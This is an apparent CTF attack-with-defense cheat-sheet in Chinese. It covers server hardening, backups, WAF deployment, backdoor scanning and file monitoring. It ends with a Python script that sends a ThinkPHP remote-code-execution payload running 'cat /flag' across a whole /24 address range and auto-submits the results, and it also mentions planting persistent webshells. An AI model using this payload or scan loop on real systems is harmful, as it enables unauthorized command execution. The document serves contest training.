1-源码备份,修改口令
xshell或者MobaXterm远程登录
修改ssh密码
passwd
打包目录
tar -zcvf file.tar.gz 要打包的目录
解包
tar -zxvf file.tar.gz
从服务器下载文件
scp [-p port] user@192.168.28.151:/home/user/a.txt b.txt
上传到服务器
scp b.txt user@192.168.28.151:/home/user/b.txt
2-部署各个环境的WAF(比赛规则)
ctf-awd-waf链接
https://github.com/DasSecurity-HatLab/AoiAWD
3-扫描源码中预留或隐藏后门
seay和D盾扫描后台预留后门,可发现攻击点。
4-代码审计配合流量监控及代码审计后续操作(框架及非框架,源码语言,漏洞库等)进行漏洞判定
5-实时监控当前目录文件上传删除等操作,有效防止恶意删除,上传后门等,后续可配合流量操作行为监控找出更多漏洞
运行minitor.py,实时监控文件变化情况;需要python2环境
sudo python minitor.py
6-批量flag实现自动获取及提交,写入不死马等操作,实现权限维持实时获取得分
import requests
from lxml import etree
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36'}
submit_url = "xxx"
for i in range(0, 255):
url = "http://111.200.241.%s:55788" % i
url += "/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag"
res = requests.get(url, headers=headers).content.decode("utf-8")
tree = etree.HTML(res)
flag = str(tree.xpath('//div/span[2]/small/text()')[0])
submit_flag_url = submit_url + flag
requests.get(submit_flag_url)
工具下载链接 https://download.csdn.net/download/weixin_42172261/60970767
HFish(蜜罐)官网https://hfish.io/#/
OpenRASP(WAF)官网https://rasp.baidu.com/